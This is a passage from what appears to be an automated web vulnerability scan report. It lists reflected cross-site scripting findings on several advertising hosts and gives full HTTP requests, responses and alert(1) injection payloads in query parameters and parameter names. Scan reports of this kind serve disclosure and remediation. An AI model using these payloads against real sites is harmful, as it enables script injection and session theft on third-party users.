GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction115a8<script>alert(1)</script>512fdd36cd3&n=ar_int_p68511049&1296999647490 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296999600%2E136%2Cwait%2D%3E10000%2C
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 13:40:10 GMT Content-Type: application/x-javascript Connection: close P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 83
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3edca%3balert(1)//64bba91453a was submitted in the jscallback parameter. This input was echoed as 3edca;alert(1)//64bba91453a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /al.asp?ts=20110206132315&adid=401622%2C401622%2C401622&cc=us&di=29166142%2C28321520%2C28321702&hk=1&ipid=12630&mh=167defd4b82c3759d8e6179eb5de4354&pid=2%2C2%2C2&pvm=b60133d74d36fa666d2419a757f62f74&pvu=F09FDD7F3F444C1FA642829D016326B5&rcc=us&so=0&syid=0%2C0%2C0&uf=0%2C0%2C0&ur=0%2C0%2C0&kp=328%2C930%3B336%2C984%3B245%2C1284%3B&prf=ll%3A1385%7Cintl%3A1992%7Cpreprochrome%3A6%7Cgetconchrome%3A27%7Cadvint%3A2035%7Cadvl%3A2035%7Ctl%3A2151&jscallback=$iTXT.js.callback13edca%3balert(1)//64bba91453a HTTP/1.1 Host: baselinemag.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 13:23:40 GMT; Path=/ Content-Type: text/javascript Content-Length: 65 Date: Sun, 06 Feb 2011 13:23:40 GMT Connection: close
4.21. http://baselinemag.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://baselinemag.us.intellitxt.com
Path:
/intellitxt/front.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91531'-alert(1)-'750bcc2e0e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /intellitxt/front.asp?ipid=12630&91531'-alert(1)-'750bcc2e0e0=1 HTTP/1.1 Host: baselinemag.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gQAAAEt99ts1wA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wUAAAEt+yJhIgA-; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 13:21:30 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wUAAAEt+yJhIgA-; Domain=.intellitxt.com; Expires=Thu, 07-Apr-2011 13:21:30 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sun, 06 Feb 2011 13:21:29 GMT Content-Length: 10716
document.itxtDisabled=1; document.itxtDebugOn=false; if(document.itxtDisabled){ document.itxtInProg=1; if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT ...[SNIP]... qoptions={tags:"1480.3017.12630"};_qacct="p-fdwEfW0hIeH9U";$iTXT.js.load("http://edge.quantserve.com/quant.js");$iTXT.js.serverUrl='http://baselinemag.us.intellitxt.com';$iTXT.js.pageQuery='ipid=12630&91531'-alert(1)-'750bcc2e0e0=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();}; }
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 19f15%3balert(1)//734f2337570 was submitted in the jscallback parameter. This input was echoed as 19f15;alert(1)//734f2337570 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/init?ts=1296998594508&pagecl=48119&fv=10&muid=&refurl=http%3A%2F%2Fwww.baselinemag.com%2Fc%2Fa%2FIT-Management%2FMacys-Ramps-Up-Online-Operations-637464%2F&ipid=12630&jscallback=$iTXT.js.callback019f15%3balert(1)//734f2337570 HTTP/1.1 Host: baselinemag.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sun, 06 Feb 2011 13:22:54 GMT Connection: close Content-Length: 12169
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback019f15;alert(1)//734f2337570({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}
4.23. http://baselinemag.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://baselinemag.us.intellitxt.com
Path:
/v4/init
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa9e1"-alert(1)-"d53ef40e92d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/init?ts=1296998594508&pagecl=48119&fv=10&muid=&refurl=http%3A%2F%2Fwww.baselinemag.com%2Fc%2Fa%2FIT-Management%2FMacys-Ramps-Up-Online-Operations-637464%2F&ipid=12630&jscallback=$iTXT.js.callback0&aa9e1"-alert(1)-"d53ef40e92d=1 HTTP/1.1 Host: baselinemag.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sun, 06 Feb 2011 13:22:55 GMT Content-Length: 12150
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... 4508","dma":623,"POSTCODE":"75207","user-agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13","REGIONNAME":"Texas","muid":"","aa9e1"-alert(1)-"d53ef40e92d":"1","city":"Dallas","jscallback":"$iTXT.js.callback0","reg":"tx","refurl":"http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/","rcc":"us","cc":"us"},null,60);var un ...[SNIP]...
The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62043"><script>alert(1)</script>6de2e5bdc2d was submitted in the btid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /i/0R8lWflQ0f_326769041.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F862043"><script>alert(1)</script>6de2e5bdc2d&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZya1ZmSmN4QQ&ciu=MFI4bFdmbFEwZg&reqid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkM&ccw=SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjB8SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjA&epid=&bp=4400&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fwww.orthougm.com%2F&refurl= HTTP/1.1 Host: cdn.w55c.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0813152173226346&output=html&h=60&slotname=3865030659&w=468&lmt=1296964160&flash=10.1.103&hl=en&url=http%3A%2F%2Fwww.orthougm.com%2F&dt=1296942560320&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=8833934355%2C8094259765&correlator=1296942560294&frm=0&adk=2257162608&ga_vid=429166960.1296942499&ga_sid=1296942499&ga_hid=1263121855&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&ref=http%3A%2F%2Fwww.orthougm.com%2Fnslookup.html&fu=0&ifi=3&dtd=3&xpc=dnlnsmkeRR&p=http%3A//www.orthougm.com Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ
The value of the ei request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19116"><script>alert(1)</script>eb6398a7c was submitted in the ei parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /i/0R8lWflQ0f_326769041.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8&ei=GOOGLE_CONTENTNETWORK19116"><script>alert(1)</script>eb6398a7c&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZya1ZmSmN4QQ&ciu=MFI4bFdmbFEwZg&reqid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkM&ccw=SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjB8SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjA&epid=&bp=4400&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fwww.orthougm.com%2F&refurl= HTTP/1.1 Host: cdn.w55c.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0813152173226346&output=html&h=60&slotname=3865030659&w=468&lmt=1296964160&flash=10.1.103&hl=en&url=http%3A%2F%2Fwww.orthougm.com%2F&dt=1296942560320&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=8833934355%2C8094259765&correlator=1296942560294&frm=0&adk=2257162608&ga_vid=429166960.1296942499&ga_sid=1296942499&ga_hid=1263121855&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&ref=http%3A%2F%2Fwww.orthougm.com%2Fnslookup.html&fu=0&ifi=3&dtd=3&xpc=dnlnsmkeRR&p=http%3A//www.orthougm.com Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ
The value of the rtbhost request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4721"><script>alert(1)</script>30dfad95144 was submitted in the rtbhost parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /i/0R8lWflQ0f_326769041.html?rtbhost=rts-rr13.sldc.dataxu.netd4721"><script>alert(1)</script>30dfad95144&btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZya1ZmSmN4QQ&ciu=MFI4bFdmbFEwZg&reqid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkM&ccw=SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjB8SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjA&epid=&bp=4400&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fwww.orthougm.com%2F&refurl= HTTP/1.1 Host: cdn.w55c.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0813152173226346&output=html&h=60&slotname=3865030659&w=468&lmt=1296964160&flash=10.1.103&hl=en&url=http%3A%2F%2Fwww.orthougm.com%2F&dt=1296942560320&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=8833934355%2C8094259765&correlator=1296942560294&frm=0&adk=2257162608&ga_vid=429166960.1296942499&ga_sid=1296942499&ga_hid=1263121855&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&ref=http%3A%2F%2Fwww.orthougm.com%2Fnslookup.html&fu=0&ifi=3&dtd=3&xpc=dnlnsmkeRR&p=http%3A//www.orthougm.com Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ
The value of the wp_exchange request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a8c2"><script>alert(1)</script>adc13858a3b was submitted in the wp_exchange parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /i/0R8lWflQ0f_326769041.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw8a8c2"><script>alert(1)</script>adc13858a3b&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZya1ZmSmN4QQ&ciu=MFI4bFdmbFEwZg&reqid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkM&ccw=SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjB8SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjA&epid=&bp=4400&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fwww.orthougm.com%2F&refurl= HTTP/1.1 Host: cdn.w55c.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0813152173226346&output=html&h=60&slotname=3865030659&w=468&lmt=1296964160&flash=10.1.103&hl=en&url=http%3A%2F%2Fwww.orthougm.com%2F&dt=1296942560320&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=8833934355%2C8094259765&correlator=1296942560294&frm=0&adk=2257162608&ga_vid=429166960.1296942499&ga_sid=1296942499&ga_hid=1263121855&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&ref=http%3A%2F%2Fwww.orthougm.com%2Fnslookup.html&fu=0&ifi=3&dtd=3&xpc=dnlnsmkeRR&p=http%3A//www.orthougm.com Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37075"><a>62ad8f466de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /kochupusthakam37075"><a>62ad8f466de/blog/malayalam-kambi-kathakal-kochu-pusthakam-hot-stories-08e6ccaa51723198405bf5af8bd98aab75c93754.html HTTP/1.1 Host: connect.in.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.4 (Unix) Pragma: no-cache nnCoection: close Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Sat, 05 Feb 2011 21:51:08 GMT Date: Sat, 05 Feb 2011 21:51:08 GMT Content-Length: 27769 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]... <meta name="description" content="Kochupusthakam37075"><a>62ad8f466de: MALAYALAM KAMBI KATHAKAL, KOCHU PUSTHAKAM. kambi kathakal kochupusthakam kambi kathakal kochupusthakam kambi kathakal kochupusthakam malayalam sex stories. MALAYALAM MASALA STORIES, MASALA VIDEOS. NI ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 76add<a>35d4dfe19df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
